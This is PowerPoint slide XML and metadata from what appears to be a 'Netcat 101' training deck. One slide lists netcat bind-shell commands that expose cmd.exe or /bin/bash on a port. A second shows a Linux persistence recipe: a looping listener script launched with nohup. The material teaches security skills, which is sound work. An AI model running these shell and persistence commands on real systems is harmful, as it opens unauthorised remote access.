        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Netcat Normal Shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IE" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>nc –Lp PORT –e cmd.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t> 	For a Windows Machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>nc –lp PORT –e /bin/bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>	For a Linux Machine</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IE" sz="2400" b="1" u="sng" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Persistance on Linux</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" sz="2400" b="1" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>echo “while [ 1 ]; do nc –lp PORT; done” &gt; listener.sh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>chmod 555 listener.sh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>nohup ./listener.sh &amp;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35488780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38924</TotalTime>
  <Words>4348</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>463</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NETCAT 101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pUZZLE TIME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Robert McArdle (RD-EMEA)</dc:creator>
  <cp:lastModifiedBy>Robert McArdle</cp:lastModifiedBy>
  <cp:revision>1855</cp:revision>
  <cp:lastPrinted>2014-08-15T14:16:24Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2006-08-16T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-11-12T10:08:13Z</dcterms:modified>
</cp:coreProperties>
</file>